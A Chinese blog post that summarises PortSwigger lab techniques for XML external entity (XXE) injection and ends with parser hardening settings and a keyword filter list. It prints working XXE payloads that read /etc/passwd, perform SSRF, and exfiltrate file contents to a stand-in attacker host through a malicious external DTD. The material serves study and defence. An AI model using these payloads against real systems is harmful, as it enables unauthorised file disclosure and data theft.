PortSwigger XML外部实体注入(XXE)

已于 2022-11-22 09:43:11 修改
阅读量990 收藏 1
点赞数 3
分类专栏: PortSwigger 靶场总结 文章标签: xml 安全 web安全 网络安全
于 2022-11-21 21:14:13 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42451330/article/details/127967705
版权

一、漏洞原理

        当应用程序使用 XML 格式传输数据,应用程序使用的是标准库来处理上传到服务器上的 XML 数据。由于XML 规范中包含了各种潜在的危险功能,而标准的解析器支持这些危险的功能,进而导致了XXE漏洞,换句话说就是引用了外部的恶意DTD。

二、常见利用方式

        1、利用外部实体检索文件

<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck>&xxe;</stockCheck>

        2、利用外部实体执行SSRF攻击

<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://internal.vulnerable-website.com/"> ]>
<stockCheck>&xxe;</stockCheck>

        3、外带交互的盲XXE

<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://f2g9j7hhkax.web-attacker.com"> ]>
<stockCheck>&xxe;</stockCheck>

        4、通过XML参数实体进行外带交互的盲XXE

<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://f2g9j7hhkax.web-attacker.com"> %xxe; ]>
<stockCheck>%xxe;</stockCheck>

        5、利用盲XEE使用外部恶意DTD泄露数据

//外部恶意DTD
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://web-attacker.com/?x=%file;'>">
%eval;
%exfiltrate;
//客户端插入XXE代码
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM
"http://web-attacker.com/malicious.dtd"> %xxe;]>

        6、利用盲XXE通过错误消息检索数据

//客户端插入XXE代码
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;

        7、利用XXE通过重新调整本地DTD的用途来检索数据

//用来测试该路径下是否存在docbookx.dtd文件,不存在报错。
<!DOCTYPE foo [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
%local_dtd;
]>
//custom_entity 为重写的实体名
<!DOCTYPE foo [
<!ENTITY % local_dtd SYSTEM "file:///usr/local/app/schema.dtd">
<!ENTITY % custom_entity '
<!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
'>
%local_dtd;
]>

        8、利用XInclude检索文件(隐藏XXE)

//将以下XXE代码当参数传入后端,后端处理参数时会引用http://www.w3.org/2001/XInclude命名空间,执行识别xi:include标签的功能性。

<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>

        9、通过图像文件上传利用XXE

//将以下代码放入SVG文件并上传
<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg>

三、常见防护措施

        1、禁用外部实体:

//php
libxml_disable_entity_loader(true);

//java
DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();
dbf.setExpandEntityReferences(false);

.setFeature("http://apache.org/xml/features/disallow-doctype-decl",true);

.setFeature("http://xml.org/sax/features/external-general-entities",false)

.setFeature("http://xml.org/sax/features/external-parameter-entities",false);

python
from lxml import etree
xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))

         2、过滤用户提交的XML数据:

        关键词:<!DOCTYPE> 、<!ENTITY> 、SYSTEM、PUBLIC、INCLUDE。

战斗爽!战斗爽!战斗爽!战斗爽!战斗爽!
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
portswigger证书
11-19
portswigger证书,der格式、pem格式,转化好的,直接可以用哦! Android设备抓包必备哦!
swurg:将OpenAPI文档解析到Burp Suite中以自动执行基于OpenAPI的API安全评估(PortSwigger批准将其包含在其官方BApp Store中)
02-03
Swurg是Burp Suite扩展,专门用于OpenAPI测试。 OpenAPI规范(OAS)为REST API定义了标准的,与编程语言无关的接口描述,使人和计算机都可以发现和理解服务的功能,而无需访问源代码,附加文档或检查网络流量。 通过OpenAPI正确定义后,使用者可以使用最少的实现逻辑来理解远程服务并与之交互。 与接口描述针对低级编程所做的类似,OpenAPI规范消除了调用服务时的猜测。 机器可读的API定义文档的用例包括但不限于:交互式文档; 文档,客户端和服务器的代码生成; 和测试用例的自动化。 OpenAPI文档描述了API的服务,并以YAML或JSON格式表示。 这些文档
基于深度学习的sql注入检测系统`内训练模型和推理脚本和环境搭建教程.zip
11-01
基于深度学习的sql注入检测系统`内训练模型和推理脚本和环境搭建教程 #### 有用的设置信息 (1) 每个应用程序都作为 WAR 文件分发在`/SUT/*.war`中; (2) 应用程序的数据库位于WAR 文件中。您可以在加载 SUT 后使用 DB 初始化脚本。 (2)`/SUT/Instrument`用于输出SUT中的SQL语句。其具体执行步骤在`/SUT/Instrument/README.md`中。 ### 2.安装爬虫 DeepSQLi 使用爬虫自动解析 SUT 的 Web 链接。 实验中我们使用Burp Suite(专业版)。 #### 有用的设置信息 (1)从官网下载【Burp Suite Pro】(https://portswigger.net/burp); (2)我们首先需要设置`\Demo\demo.log`等日志路径,以便下一步使用爬虫获取到的日志文件; (3) 保持浏览器代理与Burp Suite一致,并开始扫描SUT。 ### 3. 安装评估模块 以保证准确性。 DeepSQLi 使用强大的工具“SQL Parser”来确定 SQL 语句是否是
burpsuitezhengshu
02-04
burpsuite safty credenticate service,...................................................................................................
burpsuit 靶场(XML external entity (XXE) injection)
wanan的博客
01-23 236
burpsuit 靶场(XML external entity (XXE) injection)
Lab: Exploiting blind XXE to exfiltrate data using a malicious external DTD:利用 XXE 使用恶意外部 DTD 窃取数据...
Zeker62的博客
08-26 248
该实验室具有“检查股票”功能,可解析 XML 输入但不显示结果。 要解决实验室问题,请提取/etc/hostname文件的内容。 使用Burp Suite Professional,转到 Burp 菜单,然后启动Burp Collaborator 客户端。 单击“复制到剪贴板”将唯一的 Burp Collaborator 负载复制到剪贴板。让 Burp Collaborator 客户端窗口保持...
PortSwigger Academy | XML external entity (XXE) injection : XML外部实体注入
水榭山寺花烂漫,凤凰集外雁归来。敢与云峰争秀色,妙雨莲花九重开。
02-01 879
文章目录什么是XML外部实体注入XXE漏洞如何产生?XML实体什么是XML?什么是XML实体?什么是文件类型定义?什么是XML自定义实体?什么是XML外部实体XXE攻击有哪些类型? 在本节中,我们将解释什么是XML外部实体注入,描述一些常见的示例,解释如何发现和利用各种XXE注入,并总结如何防止XXE注入攻击。 什么是XML外部实体注入XML外部实体注入(也称为XXE)是一个网络安全漏洞,它使攻击者能够干扰应用程序对XML数据的处理。 它通常使攻击者可以查看应用程序服务器文件系统上的文件,并与应用程
PortSwigger靶场(二)XXE注入
weixin_52835927的博客
10-19 154
XML是一种用于标记电子文件使其具有结构性的标记语言,提供统一的方法来描述和交换独立于应用程序或供应商的结构化数据它可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。用我自己的理解来讲就是我们输入数据其实计算机理解不了,需要我们再输入一些东西辅助计算机进行理解,标名这是什么数据,其实更像是一种数据库,只是功能上只能存数据,也更简单进行编写,方便计算机运用,xml就可以兼容几乎所有的数据,让计算机理解,具体参考本站中的这一篇文章。
JAVA BP插件开发(一):基础插件开发
AugustTheodor的博客
03-20 1561
本文会包括BP插件开发流程及打包,API,javaswing(UI)部分的内容。阅读完本文后,读者将初步具有开发BP插件的能力。
Java代码审计——XML 外部实体注入XXE
m0_61506558的博客
11-27 1031
XXEXML 外部实体注入。当应用程序在解析 XML 输入时,在没有禁止外部实体的加载而导致加载了外部文驱动程序所必需的接口,其允许应用程序设置和查询解析器中的功能和属性、注册文档处理的事件处理程序,以及开始文档解析。当XMLReader 使用默认的解析方法并且未对。输入时,在没有禁止外部实体的加载而导致加载了外部文件及代码时,就会造成 XXE。文档的接口,其存在于公共区域中。XMLReader 接口是。XMLReader 接口是一种通过。漏洞,我们首先需要知道常见的能够解析。们一般用以下几种常见的。
buby:PortSwigger Burp Suite 的 BurpExtender 接口的 JRuby 实现
06-08
说明: Buby 是 JRuby 与 PortSwigger 流行的商业 Web 安全测试工具 Burp Suite 的混搭。 Burp 由使用 BurpExtender API 的 Java 扩展或使用新的嵌入式 JRuby 支持的 JRuby BurpExtender 实现驱动并绑定到 JRuby。 ...
burp靶场--XXE注入
最新发布
qq_33168924的博客
01-16 1007
XML 外部实体注入(也称为 XXE)是一种 Web 安全漏洞,允许攻击者干扰应用程序对 XML 数据的处理。它通常允许攻击者查看应用程序服务器文件系统上的文件,并与应用程序本身可以访问的任何后端或外部系统进行交互。在某些情况下,攻击者可以利用 XXE 漏洞执行服务器端请求伪造(SSRF) 攻击,升级 XXE 攻击以危害底层服务器或其他后端基础设施。
XML外部实体注入总结(XXE靶机复现)
Aiwin的博客
05-15 5189
XML外部实体注入,Vuln-XXE靶机复现和无回显XXE的使用
Lab: Exploiting XXE using external entities to retrieve files:利用外部实体利用 XXE 来检索文件...
Zeker62的博客
08-26 242
利用XXE检索文件 要执行从服务器的文件系统中检索任意文件的 XXE 注入攻击,您需要通过两种方式修改提交的 XML: 引入(或编辑)DOCTYPE定义包含文件路径的外部实体的元素。 编辑应用程序响应中返回的 XML 中的数据值,以使用定义的外部实体。 例如,假设购物应用程序通过向服务器提交以下 XML 来检查产品的库存水平: <?xml version="1.0" encoding="U...
XML外部实体注入漏洞- XXE
weixin_40230278的博客
08-05 837
XML外部实体注入漏洞- XXE 概览: 实验内容 影响版本: 漏洞介绍 实验结果分析与总结 修复方案 实验内容 介绍XXE漏洞的触发方式和利用方法,简单介绍XXE漏洞的修复。 影响版本: libxml2.8.0版本 漏洞介绍 XXE Injection即XML External Entity Injection,也就是XML外部实体注入攻击。漏洞是在对非安全外部实体...
《JAVA代码审计》(1)JAXB血案之 XML外部实体注入漏洞(XXE)
午夜观星河
04-22 4349
(3)@XmlElement:将Java对象的属性映射为xml的节点,在使用@XmlElement时,可通过name属性改变java对象属性在xml中显示的名称。(2)@XmlAccessorType:用于指定由Java对象生成xml文件时对Java对象属性的访问方式。(4)@XmlAttribute:将Java对象的属性映射为xml的属性,并且可通过name属性为生成的xml属性指定别名。(1)@XmlRootElement:用于类级别的注释,对应XML的根节点。
XXE - XML外部实体注入攻击
javaEE_zero的博客
01-04 574
XXE漏洞、XML外部实体注入攻击
xxe-xml外部实体注入
nigo134的博客
07-27 2814
一、XXE 是什么 介绍 XXE 之前,我先来说一下普通的 XML 注入,这个的利用面比较狭窄,如果有的话应该也是逻辑漏洞 如图所示: 既然能插入 XML 代码,那我们肯定不能善罢甘休,我们需要更多,于是出现了 XXE XXE(XML External Entity Injection) 全称为 XML 外部实体注入,从名字就能看出来,这是一个注入漏洞,注入的是什么?XML外部实体。(看到这里肯定有人要说:你这不是在废话),固然,其实我这里废话只是想强调我们的利用点是 外部实体 ,也是提醒读者将
java xml 实体注入_防止 XML外部实体注入
weixin_35193765的博客
02-16 2552
方式一DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();// 这是优先选择. 如果不允许DTDs (doctypes) ,几乎可以阻止所有的XML实体攻击String FEATURE = "http://apache.org/xml/features/disallow-doctype-decl";dbf.setFea...
portswigger Authentication
07-28
引用\[2\]提到了一些可能存在的攻击,如注入自签名证书和JWT算法混乱。引用\[3\]提到了一些签名算法的安全性问题。在进行PortSwigger的Authentication模块测试时,可以关注这些JWT相关的安全问题,以帮助发现和修复...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值